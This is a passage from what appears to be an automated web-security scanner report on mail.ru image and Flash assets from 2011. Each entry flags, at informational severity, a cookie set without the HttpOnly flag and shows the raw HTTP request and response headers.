Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1983
Connection: keep-alive
Set-Cookie: p=k+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...

16.136. http://r2.mail.ru/b12965362.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12965362.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12965362.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1986
Connection: keep-alive
Set-Cookie: p=cuoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...

16.137. http://r2.mail.ru/b12968616.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12968616.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12968616.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 7638
Connection: keep-alive
Set-Cookie: p=+dsGAErbVQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......Exif..II*.................Ducky.......d.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

16.138. http://r2.mail.ru/b12979027.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12979027.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12979027.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2333
Connection: keep-alive
Set-Cookie: p=y6YGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.................................
...[SNIP]...

16.139. http://r2.mail.ru/b13039712.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13039712.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13039712.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 1491
Connection: keep-alive
Set-Cookie: p=9doGAErbVQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.140. http://r2.mail.ru/b13044176.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13044176.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13044176.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 2252
Connection: keep-alive
Set-Cookie: p=JAEHAEmt3gAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C....................................    .    ..
...


......    ...........C.......................................................................2.2.."..............................
...[SNIP]...

16.141. http://r2.mail.ru/b13049054.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13049054.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13049054.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 19587
Connection: keep-alive
Set-Cookie: p=CeQGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H....
FExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:18 20:39:59.........
...[SNIP]...

16.142. http://r2.mail.ru/b13050852.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13050852.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13050852.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 15500
Connection: keep-alive
Set-Cookie: p=ZvYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....TExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:18 20:43:30.........
...[SNIP]...

16.143. http://r2.mail.ru/b13057590.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13057590.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13057590.swf HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:52 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 21720
Connection: keep-alive
Set-Cookie: p=1vsGAEvDVAAA; expires=Wed, 24-Apr-13 14:29:52 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:29:52 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

CWS    .x..x...u\U].7.N.-]...t..HwHs...i.)..QBP.AZ..D.E..T@QJE.l.....u...<...>...q..f......Y........p...`@..@?'.......".b.............0...a..A.h....S.u1.....P.....#..1....}...    U]....... ....'.........
...[SNIP]...

16.144. http://r2.mail.ru/b13058787.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058787.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058787.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 3168
Connection: keep-alive
Set-Cookie: p=9okGAHCbTwAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95
...C.....................................    ...    ......    


.....
.    


...C...........
...



...[SNIP]...

16.145. http://r2.mail.ru/b13058840.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058840.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058840.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1736
Connection: keep-alive
Set-Cookie: p=G+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.146. http://r2.mail.ru/b13058851.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058851.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058851.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1405
Connection: keep-alive
Set-Cookie: p=r+cGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.147. http://r2.mail.ru/b13058852.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058852.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058852.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1184
Connection: keep-alive
Set-Cookie: p=FPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.148. http://r2.mail.ru/b13058968.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058968.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058968.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 23542
Connection: keep-alive
Set-Cookie: p=29QGAEyt3gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:17 23:49:14.........
...[SNIP]...

16.149. http://r2.mail.ru/b13059223.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13059223.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13059223.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 3609
Connection: keep-alive
Set-Cookie: p=RtAGAEqpQQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C....................................................................C.......................................................................2.2..".............................    
...[SNIP]...

16.150. http://r2.mail.ru/b13059860.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13059860.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13059860.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 1805
Connection: keep-alive
Set-Cookie: p=EegGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................2.2..
...[SNIP]...

16.151. http://r2.mail.ru/b13060405.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13060405.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13060405.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:24 GMT
Content-Type: image/jpeg
Content-Length: 1285
Connection: keep-alive
Set-Cookie: p=We8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:24 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:24 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......2.2.."..............................
...[SNIP]...

16.152. http://r2.mail.ru/b13060487.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13060487.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13060487.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
